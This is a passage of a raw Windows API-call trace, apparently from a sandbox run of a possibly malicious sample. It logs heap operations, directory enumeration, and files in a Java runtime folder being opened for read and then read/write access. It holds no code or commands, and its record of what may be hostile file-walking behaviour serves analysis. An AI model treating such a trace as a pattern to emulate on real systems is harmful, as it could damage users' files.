[0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.954] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.954] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.954] AreFileApisANSI () returned 1 [0097.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0097.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0097.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar") returned 69 [0097.955] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\us_export_policy.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xbd2)) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.955] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.955] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x88, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x853a8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x88, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="\\s", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓௒")) returned 0 [0097.955] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0097.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0097.955] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0097.955] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a430 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0097.956] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.956] AreFileApisANSI () returned 1 [0097.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties", lpUsedDefaultChar=0x0) returned 56 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.956] AreFileApisANSI () returned 1 [0097.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.956] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0097.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 56 [0097.957] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.957] GetFileType (hFile=0x360) returned 0x1 [0097.957] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.957] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.957] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.957] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.957] CloseHandle (hObject=0x360) returned 1 [0097.958] AreFileApisANSI () returned 1 [0097.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0097.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 56 [0097.958] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.958] GetFileType (hFile=0x360) returned 0x1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0097.958] CloseHandle (hObject=0x360) returned 1 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.958] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.958] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.959] AreFileApisANSI () returned 1 [0097.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0097.959] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0097.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties") returned 56 [0097.959] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\sound.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba)) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.959] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x19c1c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="tzdb.dat", cAlternateFileName="")) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69bb0 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.960] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0097.960] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.960] AreFileApisANSI () returned 1 [0097.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat", lpUsedDefaultChar=0x0) returned 48 [0097.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.961] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.961] AreFileApisANSI () returned 1 [0097.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.961] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0097.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 48 [0097.961] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.961] GetFileType (hFile=0x360) returned 0x1 [0097.961] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0097.961] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.961] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.962] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.962] CloseHandle (hObject=0x360) returned 1 [0097.962] AreFileApisANSI () returned 1 [0097.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0097.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 48 [0097.962] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.962] GetFileType (hFile=0x360) returned 0x1 [0097.962] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0097.962] CloseHandle (hObject=0x360) returned 1 [0097.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.963] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.963] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.963] 